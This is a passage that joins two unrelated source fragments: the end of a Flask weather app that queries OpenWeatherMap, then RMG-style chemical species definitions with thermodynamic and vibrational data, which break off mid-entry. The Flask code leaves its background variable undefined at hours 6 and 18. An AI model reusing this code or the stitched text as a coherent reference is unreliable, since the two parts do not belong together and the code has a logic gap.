return render_template("index.html")
@app.route("/", methods=["POST"])
def add_city():
city_name = request.form["city_name"]
data = requests.get(f"http://api.openweathermap.org/data/2.5/weather?q={city_name}&units=metric&appid={API_key}")
datas = json.loads(data.text)
date = datetime.datetime.utcnow() + datetime.timedelta(seconds=datas['timezone'])
date_time = date.time().hour # set a background image according to the current city time
if date_time < 6:
background = "card evening-morning"
elif 6 < date_time < 18:
background = "card day"
elif 18 < date_time < 24:
background = "card night"
dict_with_weather_info = [{"degrees": datas["main"]["temp"], "state": datas["weather"][0]["main"],
"city": datas["name"]}]
return render_template("index.html", weathers=dict_with_weather_info, background=background)
# don't change the following way to run flask:
if __name__ == '__main__':
if len(sys.argv) > 1:
arg_host, arg_port = sys.argv[1].split(':')
app.run(host=arg_host, port=arg_port)
else:
app.run()
|
species(
label = 'CCC([O])C([O])O(11392)',
structure = SMILES('CCC([O])C([O])O'),
E0 = (-220.767,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,212.39,212.393,212.393,2800.92],'cm^-1')),
HinderedRotor(inertia=(0.00373702,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00373706,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00373701,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.558829,'amu*angstrom^2'), symmetry=1, barrier=(17.8891,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.11935,0.0688283,-7.43642e-05,5.05808e-08,-1.50964e-11,-26453.3,28.8512], Tmin=(100,'K'), Tmax=(791.097,'K')), NASAPolynomial(coeffs=[6.9304,0.0394443,-1.86459e-05,3.62347e-09,-2.56237e-13,-27372.7,2.17834], Tmin=(791.097,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-220.767,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(340.893,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(CCOJ)"""),
)
species(
label = 'HOCHO(59)',
structure = SMILES('O=CO'),
E0 = (-389.211,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1277.5,1000,1051.41,1051.94,1052.55,2787.25,4000],'cm^-1')),
HinderedRotor(inertia=(0.00861396,'amu*angstrom^2'), symmetry=1, barrier=(6.76824,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (46.0254,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4005.91,'J/mol'), sigma=(3.626,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.89836,-0.00355878,3.55205e-05,-4.385e-08,1.71078e-11,-46778.6,7.34954], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.61383,0.00644964,-2.29083e-06,3.6716e-10,-2.18737e-14,-45330.3,0.847884], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-389.211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), label="""HOCHO""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C2H5CHO(70)',
structure = SMILES('CCC=O'),
E0 = (-204.33,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2782.5,750,1395,475,1775,1000],'cm^-1')),
HinderedRotor(inertia=(0.207559,'amu*angstrom^2'), symmetry=1, barrier=(4.77219,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.208362,'amu*angstrom^2'), symmetry=1, barrier=(4.79065,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3133.67,'J/mol'), sigma=(5.35118,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=489.47 K, Pc=46.4 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.90578,0.0240644,-7.06356e-06,-9.81837e-10,5.55825e-13,-24535.9,13.5806], Tmin=(100,'K'), Tmax=(1712.49,'K')), NASAPolynomial(coeffs=[7.69109,0.0189242,-7.84934e-06,1.38273e-09,-8.99057e-14,-27060.1,-14.6647], Tmin=(1712.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-204.33,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""propanal""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC(=O)C([O])O(11574)',
structure = SMILES('CCC(=O)C([O])O'),
E0 = (-374.366,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,375,552.5,462.5,1710,3615,1277.5,1000,1380,1390,370,380,2900,435,214.497,1592.09,4000],'cm^-1')),
HinderedRotor(inertia=(0.00366396,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310634,'amu*angstrom^2'), symmetry=1, barrier=(10.1426,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310642,'amu*angstrom^2'), symmetry=1, barrier=(10.1426,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310674,'amu*angstrom^2'), symmetry=1, barrier=(10.1427,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (103.097,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06367,0.0702375,-9.47739e-05,7.96619e-08,-2.77969e-11,-44925.5,28.1307], Tmin=(100,'K'), Tmax=(787.846,'K')), NASAPolynomial(coeffs=[6.58624,0.0357236,-1.67338e-05,3.19334e-09,-2.21563e-13,-45594.7,4.07975], Tmin=(787.846,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-374.366,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + radical(C=OCOJ)"""),
)
species(
label = 'CCC([O])C(=O)O(11575)',
structure = SMILES('CCC([O])C(=O)O'),
E0 = (-418.938,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1390,370,380,2900,435,200,800,960,1120,1280,1440,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (103.097,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.27686,0.0510586,-2.34839e-05,-3.16965e-09,3.93642e-12,-50281.2,28.3171], Tmin=(100,'K'), Tmax=(1106.01,'K')), NASAPolynomial(coeffs=[12.5671,0.0259515,-1.076e-05,2.01596e-09,-1.41472e-13,-53740.4,-31.6377], Tmin=(1106.01,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-418.938,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-(Cds-O2d)H) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(C=OCOJ)"""),
)
species(
label = 'C2H5(29)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.6,1642.82,1642.96,3622.23,3622.39],'cm^-1')),
HinderedRotor(inertia=(0.866817,'amu*angstrom^2'), symmetry=1, barrier=(19.9298,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = '[O]C(O)C=O(4774)',
structure = SMILES('[O]C(O)C=O'),
E0 = (-294.078,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2782.5,750,1395,475,1775,1000,3615,1277.5,1000,1380,1390,370,380,2900,435,3550.67],'cm^-1')),
HinderedRotor(inertia=(0.0510999,'amu*angstrom^2'), symmetry=1, barrier=(2.09244,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.625001,'amu*angstrom^2'), symmetry=1, barrier=(14.37,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (75.0434,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.73016,0.0299168,-2.84183e-05,1.57731e-08,-3.78628e-12,-35325.3,19.2328], Tmin=(100,'K'), Tmax=(971.508,'K')), NASAPolynomial(coeffs=[6.01114,0.0164081,-7.56104e-06,1.46047e-09,-1.03199e-13,-35962.9,3.49881], Tmin=(971.508,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-294.078,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(174.604,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsH) + group(Cds-OdCsH) + radical(C=OCOJ)"""),
)
species(
label = '[O][CH]O(171)',
structure = SMILES('[O][CH]O'),
E0 = (5.37818,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1277.5,1000,1989.68],'cm^-1')),
HinderedRotor(inertia=(0.0937094,'amu*angstrom^2'), symmetry=1, barrier=(2.15456,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (46.0254,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.40204,0.0209571,-4.96202e-05,5.95355e-08,-2.44634e-11,660.882,10.3084], Tmin=(100,'K'), Tmax=(868.739,'K')), NASAPolynomial(coeffs=[-0.343229,0.0179325,-9.40003e-06,1.81361e-09,-1.23835e-13,2076.48,32.2523], Tmin=(868.739,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(5.37818,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-OsOsHH) + radical(OCJO) + radical(OCOJ)"""),
)
species(
label = 'CC[CH][O](563)',
structure = SMILES('CC[CH][O]'),
E0 = (133.127,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,298.357,1774.23],'cm^-1')),
HinderedRotor(inertia=(0.129074,'amu*angstrom^2'), symmetry=1, barrier=(8.14273,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00364816,'amu*angstrom^2'), symmetry=1, barrier=(8.14268,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.1585,0.0245341,-8.42945e-06,1.83944e-10,2.32791e-13,16036.2,14.3859], Tmin=(100,'K'), Tmax=(2077.96,'K')), NASAPolynomial(coeffs=[11.8474,0.0146996,-6.30487e-06,1.09829e-09,-6.9226e-14,10937.4,-37.4679], Tmin=(2077.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.127,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(CCOJ) + radical(CCsJOH)"""),
)
species(
label = 'OH(5)',
structure = SMILES('[OH]'),
E0 = (28.372,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3287.46],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (17.0073,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.4858,0.00133397,-4.70043e-06,5.64379e-09,-2.06318e-12,3411.96,1.99788], Tmin=(100,'K'), Tmax=(1005.25,'K')), NASAPolynomial(coeffs=[2.88225,0.00103869,-2.35652e-07,1.40229e-11,6.34581e-16,3669.56,5.59053], Tmin=(1005.25,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.372,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC([O])C=O(10833)',
structure = SMILES('CCC([O])C=O'),
E0 = (-153.252,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2782.5,750,1395,475,1775,1000,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,728.565,4000],'cm^-1')),
HinderedRotor(inertia=(0.0133711,'amu*angstrom^2'), symmetry=1, barrier=(4.98983,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.714663,'amu*angstrom^2'), symmetry=1, barrier=(16.4315,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.7158,'amu*angstrom^2'), symmetry=1, barrier=(16.4576,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (87.0972,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78185,0.0407275,-1.0197e-05,-1.25231e-08,6.72473e-12,-18345.2,25.1938], Tmin=(100,'K'), Tmax=(1058.66,'K')), NASAPolynomial(coeffs=[10.6252,0.0237944,-9.55575e-06,1.77796e-09,-1.24964e-13,-21141.2,-22.3363], Tmin=(1058.66,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-153.252,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsHH) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsHHH) + group(Cds-OdCsH) + radical(C=OCOJ)"""),
)
species(
label = 'CC[C](O)C([O])O(11576)',
structure = SMILES('CC[C](O)C([O])O'),
E0 = (-274.5,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.546778,0.0848678,-0.000130386,1.17084e-07,-4.16283e-11,-32899,30.5033], Tmin=(100,'K'), Tmax=(832.077,'K')), NASAPolynomial(coeffs=[6.40553,0.0399062,-1.90522e-05,3.62214e-09,-2.48933e-13,-33292.5,6.80931], Tmin=(832.077,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-274.5,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(C2CsJOH)"""),
)
species(
label = 'CCC([O])[C](O)O(11577)',
structure = SMILES('CCC([O])[C](O)O'),
E0 = (-241.226,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.759501,0.072888,-7.5304e-05,4.23075e-08,-9.72939e-12,-28897.4,29.2657], Tmin=(100,'K'), Tmax=(1042.29,'K')), NASAPolynomial(coeffs=[12.0388,0.0296014,-1.30086e-05,2.46225e-09,-1.72257e-13,-31248.6,-25.6175], Tmin=(1042.29,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-241.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CC(C)OJ)"""),
)
species(
label = 'C[CH]C(O)C([O])O(11578)',
structure = SMILES('C[CH]C(O)C([O])O'),
E0 = (-251.226,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2800,2850,1350,1500,750,1050,1375,1000,3580,3650,1210,1345,900,1100,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,211.525,836.048,1654.94],'cm^-1')),
HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136891,'amu*angstrom^2'), symmetry=1, barrier=(3.53514,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.14425,0.0677038,-7.203e-05,4.66356e-08,-1.30423e-11,-30116.9,31.4492], Tmin=(100,'K'), Tmax=(845.985,'K')), NASAPolynomial(coeffs=[7.70664,0.036676,-1.70161e-05,3.28341e-09,-2.31432e-13,-31227.3,0.886926], Tmin=(845.985,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-251.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCJCO)"""),
)
species(
label = 'CCC(O)[C]([O])O(11579)',
structure = SMILES('CCC(O)[C]([O])O'),
E0 = (-245.881,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39412,0.0668244,-5.35377e-05,-1.28134e-08,3.81293e-11,-29488.4,28.8506], Tmin=(100,'K'), Tmax=(512.589,'K')), NASAPolynomial(coeffs=[7.14669,0.0383248,-1.81032e-05,3.48272e-09,-2.43479e-13,-30293.4,2.84173], Tmin=(512.589,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-245.881,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(Cs_P)"""),
)
species(
label = 'CC[C]([O])C(O)O(11580)',
structure = SMILES('CC[C]([O])C(O)O'),
E0 = (-269.844,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.505983,0.0815695,-0.000104091,7.4982e-08,-2.20571e-11,-32333.2,28.9158], Tmin=(100,'K'), Tmax=(825.577,'K')), NASAPolynomial(coeffs=[10.6633,0.0323566,-1.46768e-05,2.77919e-09,-1.92929e-13,-34010.4,-18.1407], Tmin=(825.577,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-269.844,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(C2CsJOH)"""),
)
species(
label = 'C[CH]C([O])C(O)O(11581)',
structure = SMILES('C[CH]C([O])C(O)O'),
E0 = (-246.57,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.729126,0.0692341,-6.45545e-05,3.16787e-08,-6.28084e-12,-29535.5,31.1768], Tmin=(100,'K'), Tmax=(1208.42,'K')), NASAPolynomial(coeffs=[13.8307,0.0258666,-1.07228e-05,1.98062e-09,-1.3685e-13,-32702,-34.5109], Tmin=(1208.42,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-246.57,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CC(C)OJ)"""),
)
species(
label = '[CH2]CC(O)C([O])O(11582)',
structure = SMILES('[CH2]CC(O)C([O])O'),
E0 = (-245.881,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3580,3650,1210,1345,900,1100,3000,3100,440,815,1455,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.39412,0.0668244,-5.35377e-05,-1.28134e-08,3.81293e-11,-29488.4,29.9493], Tmin=(100,'K'), Tmax=(512.589,'K')), NASAPolynomial(coeffs=[7.14669,0.0383248,-1.81032e-05,3.48272e-09,-2.43479e-13,-30293.4,3.94035], Tmin=(512.589,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-245.881,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(RCCJ)"""),
)
species(
label = 'CCC(O)C([O])[O](11583)',
structure = SMILES('CCC(O)C([O])[O]'),
E0 = (-225.423,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
